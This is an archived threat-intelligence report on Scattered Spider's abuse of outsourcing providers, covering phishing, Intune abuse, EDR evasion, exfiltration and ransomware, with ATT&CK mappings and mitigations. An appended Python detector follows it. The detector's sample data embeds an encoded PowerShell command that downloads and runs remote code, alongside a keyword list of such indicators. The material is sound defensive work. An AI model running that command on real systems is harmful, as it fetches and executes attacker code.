{
	"id": "04ea5b91-89d3-4e3f-b562-02b7c39208ae",
	"created_at": "2026-04-06T00:22:24.971496Z",
	"updated_at": "2026-04-10T03:31:49.895811Z",
	"deleted_at": null,
	"sha1_hash": "73a55a682600a5a82a855c95313b8d7152df065b",
	"title": "Scattered Spider and Other Criminal Compromise of Outsourcing Providers Increases Victim Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 83851,
	"plain_text": "Scattered Spider and Other Criminal Compromise of Outsourcing\r\nProviders Increases Victim Attacks\r\nBy Halcyon RISE Team\r\nPublished: 2025-07-02 · Archived: 2026-04-05 17:17:27 UTC\r\nIndependent Halcyon research and open-source intelligence have identified several recent instances of\r\ncybercriminals, including Scattered Spider, compromising call centers and other third-party service companies—\r\nknown as Business Process Outsourcing (BPO) providers—to facilitate their attacks against larger numbers of\r\nvictims, often concentrated in one or a few sectors.\r\nIn the first half of 2025, these compromises enabled threat actors to steal hundreds of millions of dollars\r\nfrom a crypto firm and underpinned Scattered Spider’s compromise of multiple victims in the retail and insurance\r\nindustries.\r\nExecutive Summary:\r\nEnforce phishing-resistant MFA (e.g., FIDO2/WebAuthn security keys, certificate-based authentication) across both\r\ninternal users and third-party service accounts. Number matching hardens push-based MFA against prompt fatigue\r\nbut does not resist adversary-in-the-middle phishing.\r\nEliminate voice/text-based MFA and disable legacy authentication protocols to prevent credential replay\r\nand bypass.\r\nAudit access and activity from BPO or managed service provider (MSP) partners, especially device\r\nmonitoring, privileged access use, and insider risk reporting.\r\nMonitor for spoofed domains, suspicious login flows, or cloned authentication pages—especially those\r\nmimicking helpdesk or HR communications.\r\nOperational Impact  \r\nA successful intrusion at a BPO can lead to rapid lateral access across dozens of client environments, introducing\r\na dangerous multiplier effect for organizations that rely on third-party service providers.\r\nRecent Scattered Spider attacks against UK retail and US insurance industries likely originated, at least in part,\r\nfrom the group’s compromise of BPO companies. Scattered Spider (also tracked as UNC3944, Starfraud, Scatter\r\nSwine, and Muddled Libra) has shown sustained activity since 2022. 
The group is highly adept at social\r\nengineering, often masquerading as IT staff, and is known for deep reconnaissance of victim environments before\r\nmoving to active stages of attack.  \r\nScattered Spider has used BPO compromise at least since its compromise of a major casino in 2023. As the group\r\nintensifies its focus on high-value sectors in the United States, use of BPO providers without additional safeguards\r\npresents a significant supply chain risk.\r\nhttps://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks\r\nPage 1 of 6\n\nFor business leaders, this represents more than an IT issue—it’s a business continuity risk. Threat actors can lock\r\ndown cloud infrastructure, steal sensitive IP, or extort companies with stolen data. In extreme cases, organizations\r\nmay lose access to their primary identity providers or SaaS environments, halting operations for days or weeks.\r\nThe cost of such an attack can far exceed ransom demands, with reputational damage, legal exposure, and\r\noperational losses compounding quickly.  \r\nThis report expands upon the Halcyon analysis of Scattered Spider’s attack chain and pulls back the curtain on\r\ntheir suspected BPO-centric attack lifecycle. What follows is a phase-by-phase breakdown specific to the group’s\r\nleveraging of BPO providers mapped to the MITRE ATT\u0026CK framework to equip defenders with the context and\r\nunderstanding needed to detect, disrupt, and reduce organizational risk regarding this evolving and highly\r\nimpactful ransomware threat.\r\nTargeting and Industry Rotation  \r\nScattered Spider demonstrates a calculated and opportunistic targeting strategy, rotating across industries and\r\ngeographies based on visibility, payout potential, and operational heat. 
The group recently shifted its focus more\r\nheavily toward US sectors such as transportation (aviation)—industries with high reliance on remote access\r\ninfrastructure and high-value extortion potential. This adaptive targeting pattern allows Scattered Spider to stay\r\noperational and profitable even as defenders close gaps in previously targeted regions and sectors.\r\nOther known sectors targeted by the group include insurance, manufacturing, and food production—all of which\r\nare heavily reliant on BPOs, third-party SaaS platforms, and remote access tools. These industries often present\r\ncomplex supply chains, inconsistent security hygiene, and high consequences for downtime, making them ideal\r\ncandidates for extortion-based operations.\r\nThe same adaptability sustains the group as law enforcement attention intensifies, reinforcing the need for\r\ncross-sector threat intelligence sharing and proactive detection of lateral movement within interconnected\r\nvendor environments. [T1589.001, T1591.002, T1598.002, T1584]\r\nInsider Recruitment \u0026 BPO Weaknesses  \r\nScattered Spider has consistently leveraged insider recruitment as a strategic enabler, particularly within poorly\r\nmonitored BPO environments. These operations often exploit a combination of social engineering, financial\r\nincentives, and personal vulnerabilities to convince employees to facilitate access or execute specific tasks on\r\nbehalf of the attackers.\r\nRecruitment efforts typically begin via platforms like LinkedIn, Telegram, or WhatsApp, where operators identify\r\nindividuals with privileged access or exposure to identity systems, customer service platforms, or endpoint\r\ntooling. 
Employees facing financial stress, social instability, or limited institutional oversight are especially at risk.\r\nIn some cases, insiders are paid by the threat actors to install remote access software, approve MFA prompts, or\r\ntemporarily hand off control of their session. In others, they may be asked to test detection boundaries by\r\ndeploying tooling or copying files.\r\nThese insider facilitators are instrumental in establishing or maintaining long-term access—particularly in BPO\r\nenvironments where endpoint logging, identity governance, or behavioral monitoring is limited or fragmented.\r\n[T1585.001, T1586.003, T1566.002]\r\nInitial Access  \r\nAfter gaining access to a BPO provider, initial access vectors against downstream victims would likely have\r\nincluded credential phishing via spoofed HR messages (e.g., fake reduction-in-force notifications) and IT alerts\r\ncrafted to induce urgency or compliance.\r\nThese lures are typically engineered using typographical obfuscation (e.g., Cyrillic homoglyphs, swapped letters)\r\nand link to cloned login portals that closely mimic legitimate authentication pages, often replicating the\r\norganization’s exact MFA workflow, such as Duo push prompts or Okta sign-ins.\r\nIn parallel, callback phishing campaigns may have been used to reinforce trust or escalate access. Victims receive\r\nmessages over email or Microsoft Teams instructing them to call a fake support number, where operators\r\nimpersonate IT staff and guide users through downloading remote access tools like AnyDesk or ScreenConnect.\r\nThis hybrid social engineering approach allows the attackers to bypass technical controls and gain interactive\r\naccess to privileged user sessions, effectively accelerating the compromise chain. 
[T1566.001, T1566.002, T1078]\r\nPersistence and Privilege Escalation  \r\nOnce inside, the threat actors likely enrolled new MFA tokens to maintain persistent access and evade detection.\r\nThey have been observed using Microsoft Intune to execute Base64-encoded PowerShell payloads, which deploy\r\nadditional tooling or manipulate device management policies. This allows them to sideload custom endpoint\r\ndetection and response (EDR) bypasses or maintain long-term presence under the guise of legitimate\r\nadministrative activity.\r\nTo escalate privileges, the group may exploit misconfigurations or leverage existing elevated accounts, including\r\nservice principals or unattended admin sessions. In multiple documented cases, Scattered Spider actors removed\r\nall global administrators from compromised Microsoft Entra ID (Azure AD) tenants, effectively locking out defenders\r\nand delaying remediation.\r\nThis tactic disables centralized visibility and control, forcing victims into a reactive position and complicating\r\nrecovery timelines. Additionally, the group is known to persist via compromised service accounts or devices\r\nmasquerading as trusted endpoints, further reducing the likelihood of detection. [T1078.004, T1546.008, T1068,\r\nT1548]\r\nData Exfiltration  \r\nThe group likely focused heavily on the exfiltration of internal IT documentation such as detailed blueprints of the\r\nvictim’s infrastructure, access controls, and privileged workflows. These documents often contain hardcoded\r\ncredentials, API tokens, cloud tenant mappings, network diagrams, and service account usage patterns, making\r\nthem extremely valuable for both immediate exploitation and resale to other threat actors.\r\nScattered Spider actors have been observed using legitimate backup and file replication tools like Veeam, as well\r\nas cloud storage services such as Mega, GoFile.io, Transfer.sh, and Zenfiles, to exfiltrate this data covertly. 
In\r\nmore sophisticated cases, exfiltration occurs through compromised cloud tenants, allowing attackers to stage and\r\ntransfer data under the guise of normal business operations. These tactics allow the group to bypass outbound\r\nfiltering and detection, especially in environments where backup or sync tools are already allow-listed by default.\r\nThe result is a high-fidelity theft operation that is often completed before encryption or other disruptive actions\r\noccur, giving Scattered Spider significant leverage during the extortion phase. [T1041, T1567.002]\r\nRansomware Deployment  \r\nEncryption is typically not the immediate goal for Scattered Spider, but rather an escalation tactic deployed when\r\nvictims resist extortion demands or show signs of initiating incident response. This approach aligns with a\r\nbroader data-first extortion model, where the threat actor seeks to monetize exfiltrated information before\r\ntriggering visible disruption.\r\nThe group has been linked to multiple ransomware payloads, including Akira, Play, Qilin, and DragonForce, each\r\nof which offers varying degrees of customization and stealth. Notably, Scattered Spider appears to favor\r\nConti-derived encryptors, which are designed for speed and irreversibility. These payloads typically perform\r\nmulti-threaded file encryption with a fast symmetric cipher (ChaCha variants in the Conti lineage, AES-256 in\r\nother families), wrap the per-file keys with an embedded RSA public key, and provide no recovery path without\r\nthe operators’ private key. This technical choice reflects a strategic intent to maximize pressure on the victim,\r\neither to push them toward ransom negotiations or punish them for defiance.\r\nBecause encryption is often delayed until late in the attack lifecycle, organizations may not realize they have been\r\ncompromised until business operations are already at risk. 
[T1486, T1489, T1562.001]\r\nDetection and Containment Gaps  \r\nScattered Spider’s use of Bring Your Own Vulnerable Driver (BYOVD) techniques, endpoint detection and\r\nresponse (EDR) evasion via custom Rust- and Go-based binaries, and selective targeting of poorly monitored\r\nsystems reveals a sophisticated awareness of modern detection blind spots. BYOVD payloads are often deployed\r\nto disable kernel-level protections, terminate EDR processes, or sideload malicious code under the guise of\r\nlegitimate drivers. These drivers are sometimes custom-compiled or sourced from public catalogs of\r\nknown-vulnerable signed drivers, and paired with obfuscated loaders to further reduce detection.\r\nIn addition to BYOVD, the group develops lightweight custom payloads, often written in Rust or Go, that are\r\ndesigned for speed, in-memory execution, and a low forensic footprint. These payloads may be used to disable\r\nlogging, bypass the Antimalware Scan Interface (AMSI), or interact directly with APIs to enumerate or disable\r\nendpoint defenses.\r\nScattered Spider prioritizes lateral movement toward systems explicitly excluded from monitoring, such as\r\npublic-facing web apps, jump boxes, or environments running legacy software. They also take advantage of\r\nover-permissive allow-lists within EDR and Security Information and Event Management (SIEM) tooling by staging\r\npayloads in directories trusted by default or used by third-party applications. This allows them to remain\r\nundetected long enough to deploy payloads or exfiltrate data. [T1027, T1218, T1562, T1053.005, T1548.002,\r\nT1611]\r\nBehavioral Triggers  \r\nOperators closely monitor internal communications, ticketing systems, and file shares for any reference to their\r\naliases or activity, including names like Scattered Spider, Muddled Libra, Starfraud, or related IOCs. 
This internal\r\nsurveillance is often enabled through compromised email inboxes, cloud admin panels, or service accounts with\r\naccess to shared collaboration tools. Their goal is to identify when defenders have detected their presence or are\r\npreparing for an incident response operation.\r\nMentions of specific security vendors such as Halcyon, CrowdStrike, or Mandiant can serve as a trigger for attack\r\nescalation. When detected, operators are known to shift into a rapid execution phase, deploying ransomware and\r\nlocking out admin users within hours, sometimes the same day. In many cases, these accelerations occur before\r\nthe victim’s security team has a chance to fully mobilize.\r\nThis defensive evasion tactic transforms passive reconnaissance into an active kill switch, where the threat actor\r\ncontrols when and how disruption occurs based on perceived detection. [T1114.002, T1087.002, T1056.001]\r\nGroup Structure and Tradecraft Variation  \r\nScattered Spider operates as a decentralized but tightly aligned group, with a clear division of roles and\r\nresponsibilities among its members. Senior operators and group leaders often function as project managers,\r\ncoordinating initial access brokers, ransomware affiliates, and negotiators while managing communications and\r\noperational timing. Meanwhile, junior affiliates or newcomers are frequently observed conducting lower-tier\r\noperations to prove themselves, such as deploying off-the-shelf tools, testing detection thresholds, or handling\r\ninitial phishing campaigns.\r\nThis tiered structure results in variable tradecraft: some intrusions are executed with extreme speed and precision\r\nfeaturing ransomware deployment in under an hour, while others involve weeks of stealthy lateral movement, data\r\nstaging, and extortion preparation. Tradecraft variation is often a function of operator maturity, assigned objective,\r\nand the group’s perceived level of urgency. 
In some cases, operators deliberately slow-roll intrusions to avoid\r\ntriggering defenses and preserve long-term access to high-value targets.\r\nThe group’s organizational model enables scalability while minimizing risk exposure and may draw talent or\r\ntooling from other ransomware crews, including former members of Conti or Black Basta. [T1583.001,\r\nT1584.001, T1585.002]\r\nDetection, Mitigation \u0026 Incident Response  \r\nOrganizations should assume that Scattered Spider or similar threat actors may already be present within\r\noutsourced environments, particularly BPO infrastructures. Effective response requires:\r\nStrengthen Endpoint Coverage: Ensure all systems—especially those managed by vendors—are\r\nprotected with EPP and EDR/XDR. To detect attacks that routinely evade traditional tools, organizations\r\nshould also deploy dedicated anti-ransomware and anti-exfiltration solutions capable of identifying stealthy\r\nencryption and data theft behaviors.\r\nLog Visibility Across Third Parties: Ensure security teams have access to relevant logs, including\r\nauthentication events, from vendors and support providers.\r\nAudit Remote Tools: Look for unauthorized or excessive use of remote monitoring and management\r\n(RMM) tools (e.g., AnyDesk, ScreenConnect, Atera) and scripting platforms such as PowerShell or cmd-based launchers.\r\nWatch for Intune Abuse: Monitor for unusual Base64-encoded script execution through Microsoft Intune or similar\r\nplatforms.\r\nDetect MFA Changes: Flag unexpected MFA device registrations—especially from unrecognized\r\ngeographies or source networks.\r\nMonitor for Known C2 Patterns: Block or alert on traffic to ngrok, Mega, GoFile.io, and similar services\r\noften abused for command-and-control or exfiltration.\r\nHarden Identity Infrastructure: Disable legacy authentication outright, enforce conditional access\r\npolicies, and be prepared to cut SSO integration into critical tools during an incident.\r\nPrepare for Tenant Lockout Scenarios: Develop and rehearse recovery playbooks that assume loss of\r\ncontrol over cloud tenants or identity providers.\r\nConclusion  \r\nThis report builds on prior Halcyon analysis of Scattered Spider’s TTPs to spotlight how supply chain exposure—\r\nparticularly through Business Process Outsourcing (BPO) providers—can rapidly cascade across sectors and\r\nborders. The group’s use of social engineering, insider recruitment, and infrastructure abuse illustrates how\r\nmodern ransomware actors have evolved into full-spectrum, persistent threats capable of operating across both\r\ntechnical and human attack surfaces.\r\nOrganizations reduce this risk by going beyond hardening internal defenses to continuously assessing the\r\nsecurity posture of their third-party partners, especially those with elevated access or remote\r\nmanagement roles. This includes validating identity governance controls, understanding how insider risk is\r\nreported and managed, and ensuring visibility into outsourced operations.\r\nHalcyon eliminates the business impact of ransomware. Modern enterprises rely on Halcyon to prevent\r\nransomware attacks, eradicating cybercriminals’ ability to encrypt systems, steal data, and extort companies –\r\ntalk to a Halcyon expert today to find out more, and check out our quarterly RaaS and extortion group reference\r\nguide, Power Rankings: Ransomware Malicious Quartile.\r\nSource: https://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks"
	],
	"report_names": [
		"scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks"
	],
	"threat_actors": [
		{
			"id": "9ddc7baf-2ea7-4294-af2c-5fce1021e8e8",
			"created_at": "2023-06-23T02:04:34.386651Z",
			"updated_at": "2026-04-10T02:00:04.772256Z",
			"deleted_at": null,
			"main_name": "Muddled Libra",
			"aliases": [
				"0ktapus",
				"Scatter Swine",
				"Scattered Spider"
			],
			"source_name": "ETDA:Muddled Libra",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7da6012f-680b-48fb-80c4-1b8cf82efb9c",
			"created_at": "2023-11-01T02:01:06.643737Z",
			"updated_at": "2026-04-10T02:00:05.340198Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"Scattered Spider",
				"Roasted 0ktapus",
				"Octo Tempest",
				"Storm-0875",
				"UNC3944"
			],
			"source_name": "MITRE:Scattered Spider",
			"tools": [
				"WarzoneRAT",
				"Rclone",
				"LaZagne",
				"Mimikatz",
				"Raccoon Stealer",
				"ngrok",
				"BlackCat",
				"ConnectWise"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "6608b798-f92b-42af-a93f-d72800eeb3a3",
			"created_at": "2023-11-30T02:00:07.292Z",
			"updated_at": "2026-04-10T02:00:03.482199Z",
			"deleted_at": null,
			"main_name": "DragonForce",
			"aliases": [],
			"source_name": "MISPGALAXY:DragonForce",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8c8fea8c-c957-4618-99ee-1e188f073a0e",
			"created_at": "2024-02-02T02:00:04.086766Z",
			"updated_at": "2026-04-10T02:00:03.563647Z",
			"deleted_at": null,
			"main_name": "Storm-1567",
			"aliases": [
				"Akira",
				"PUNK SPIDER",
				"GOLD SAHARA"
			],
			"source_name": "MISPGALAXY:Storm-1567",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "843f4240-33a7-4de4-8dcf-4ff9f9a8c758",
			"created_at": "2025-07-24T02:05:00.538379Z",
			"updated_at": "2026-04-10T02:00:03.657424Z",
			"deleted_at": null,
			"main_name": "GOLD FLAME",
			"aliases": [
				"DragonForce"
			],
			"source_name": "Secureworks:GOLD FLAME",
			"tools": [
				"ADFind",
				"AnyDesk",
				"Cobalt Strike",
				"FileSeek",
				"Mimikatz",
				"SoftPerfect Network Scanner",
				"SystemBC",
				"socks.exe"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c3b908de-3dd1-4e5d-ba24-5af8217371f0",
			"created_at": "2023-10-03T02:00:08.510742Z",
			"updated_at": "2026-04-10T02:00:03.374705Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"UNC3944",
				"Scattered Swine",
				"Octo Tempest",
				"DEV-0971",
				"Starfraud",
				"Muddled Libra",
				"Oktapus",
				"Scatter Swine",
				"0ktapus",
				"Storm-0971"
			],
			"source_name": "MISPGALAXY:Scattered Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84",
			"created_at": "2024-04-24T02:00:49.516358Z",
			"updated_at": "2026-04-10T02:00:05.309426Z",
			"deleted_at": null,
			"main_name": "Akira",
			"aliases": [
				"Akira",
				"GOLD SAHARA",
				"PUNK SPIDER",
				"Howling Scorpius"
			],
			"source_name": "MITRE:Akira",
			"tools": [
				"Mimikatz",
				"PsExec",
				"AdFind",
				"Akira _v2",
				"Akira",
				"Megazord",
				"LaZagne",
				"Rclone"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d093e8d9-b093-47b8-a988-2a5cbf3ccec9",
			"created_at": "2023-10-14T02:03:13.99057Z",
			"updated_at": "2026-04-10T02:00:04.531987Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"0ktapus",
				"LUCR-3",
				"Muddled Libra",
				"Octo Tempest",
				"Scatter Swine",
				"Scattered Spider",
				"Star Fraud",
				"Storm-0875",
				"UNC3944"
			],
			"source_name": "ETDA:Scattered Spider",
			"tools": [
				"ADRecon",
				"AnyDesk",
				"ConnectWise",
				"DCSync",
				"FiveTran",
				"FleetDeck",
				"Govmomi",
				"Hekatomb",
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"Lumma Stealer",
				"LummaC2",
				"Mimikatz",
				"Ngrok",
				"PingCastle",
				"ProcDump",
				"PsExec",
				"Pulseway",
				"Pure Storage FlashArray",
				"Pure Storage FlashArray PowerShell SDK",
				"RedLine Stealer",
				"Rsocx",
				"RustDesk",
				"ScreenConnect",
				"SharpHound",
				"Socat",
				"Spidey Bot",
				"Splashtop",
				"Stealc",
				"TacticalRMM",
				"Tailscale",
				"TightVNC",
				"VIDAR",
				"Vidar Stealer",
				"WinRAR",
				"WsTunnel",
				"gosecretsdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e424a2db-0f5a-4ee5-96d2-5ab16f1f3824",
			"created_at": "2024-06-19T02:03:08.062614Z",
			"updated_at": "2026-04-10T02:00:03.655475Z",
			"deleted_at": null,
			"main_name": "GOLD HARVEST",
			"aliases": [
				"Octo Tempest ",
				"Roasted 0ktapus ",
				"Scatter Swine ",
				"Scattered Spider ",
				"UNC3944 "
			],
			"source_name": "Secureworks:GOLD HARVEST",
			"tools": [
				"AnyDesk",
				"ConnectWise Control",
				"Logmein"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434944,
	"ts_updated_at": 1775791909,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/73a55a682600a5a82a855c95313b8d7152df065b.pdf",
		"text": "https://archive.orkl.eu/73a55a682600a5a82a855c95313b8d7152df065b.txt",
		"img": "https://archive.orkl.eu/73a55a682600a5a82a855c95313b8d7152df065b.jpg"
	}
}
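The report's "Detection, Mitigation & Incident Response" checklist names two checks without showing how to run them: flagging MFA device registrations from unrecognized geographies, and catching Base64-encoded PowerShell pushed through Microsoft Intune. The Python below is an added example, not code from Halcyon or from the page, that implements both checks over constructed sample telemetry. The event records, user and host names, field names, and the management-agent process list are assumptions made for the illustration; they are not a real Entra ID, Intune or EDR schema.

```python
"""
Added example (not from the Halcyon report): two checks from its detection
checklist, run over constructed sample telemetry.

  1. MFA device registrations from a country the user has never signed in from.
  2. Base64-encoded PowerShell (-EncodedCommand) decoded and checked for
     download-and-execute patterns, flagged outright when the parent process is
     a device-management agent (the Intune abuse the report describes).

Every record below is constructed for this example; the field names are
assumptions, not a real Entra ID, Intune or EDR schema.
"""
import base64
import re
from datetime import datetime


def encode_ps(command: str) -> str:
    """Encode as `powershell -EncodedCommand` expects: UTF-16LE, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# --- constructed sample telemetry (assumed field names) ---------------------
SIGN_INS = [
    {"user": "alice@corp.example", "country": "US", "ts": "2025-06-01T08:00:00Z"},
    {"user": "alice@corp.example", "country": "US", "ts": "2025-06-02T08:05:00Z"},
    {"user": "bob@corp.example", "country": "GB", "ts": "2025-06-01T09:00:00Z"},
]
MFA_REGISTRATIONS = [
    {"user": "alice@corp.example", "country": "US", "method": "Authenticator",
     "ts": "2025-06-02T08:30:00Z"},
    {"user": "bob@corp.example", "country": "NG", "method": "Authenticator",
     "ts": "2025-06-03T02:41:00Z"},
]
# Parent processes that mean a script arrived via a management platform.
# Assumed list for this example; extend it per environment.
MANAGEMENT_PARENTS = {"Microsoft.Management.Services.IntuneWindowsAgent.exe"}
PROCESS_EVENTS = [
    {"host": "WS-0412", "parent": "Microsoft.Management.Services.IntuneWindowsAgent.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -enc "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")},
    {"host": "WS-0412", "parent": "Microsoft.Management.Services.IntuneWindowsAgent.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\ProgramData\\inventory.ps1"},
    {"host": "WS-0098", "parent": "explorer.exe",
     "cmdline": "powershell.exe -enc " + encode_ps("Get-Date")},
]


def _ts(value: str) -> datetime:
    # fromisoformat() only accepts a trailing "Z" from Python 3.11 on.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def unexpected_mfa_registrations(registrations, sign_ins):
    """Flag registrations from a country the user had never signed in from before."""
    findings = []
    for reg in registrations:
        prior = {s["country"] for s in sign_ins
                 if s["user"] == reg["user"] and _ts(s["ts"]) < _ts(reg["ts"])}
        if reg["country"] not in prior:
            findings.append({"user": reg["user"], "country": reg["country"],
                             "method": reg["method"], "known_countries": sorted(prior)})
    return findings


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_ARG = re.compile(r"(?i)\s-e\w*\s+([A-Za-z0-9+/=]{16,})")
# Keyword triage only; a production rule would score these rather than substring-match.
SUSPICIOUS = ("invoke-expression", "iex", "net.webclient", "downloadstring",
              "invoke-webrequest", "frombase64string")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def suspicious_encoded_powershell(events):
    """Flag encoded PowerShell launched by a management agent or decoding to
    download-and-execute patterns."""
    findings = []
    for ev in events:
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        hits = [k for k in SUSPICIOUS if k in decoded.lower()]
        via_mgmt = ev["parent"] in MANAGEMENT_PARENTS
        if hits or via_mgmt:
            findings.append({"host": ev["host"], "parent": ev["parent"],
                             "decoded": decoded, "indicators": hits,
                             "via_management_agent": via_mgmt})
    return findings


if __name__ == "__main__":
    for f in unexpected_mfa_registrations(MFA_REGISTRATIONS, SIGN_INS):
        print("MFA registration outside baseline:", f)
    for f in suspicious_encoded_powershell(PROCESS_EVENTS):
        print("Suspicious encoded PowerShell:", f)
```

The MFA check builds the baseline only from sign-ins that predate the registration, so a registration that immediately follows an attacker's first login from a new country is still flagged. The PowerShell check decodes the payload rather than alerting on the mere presence of an encoded argument, which keeps benign encoded maintenance scripts out of the queue unless they arrive via the management agent, where the report says defenders should look hardest.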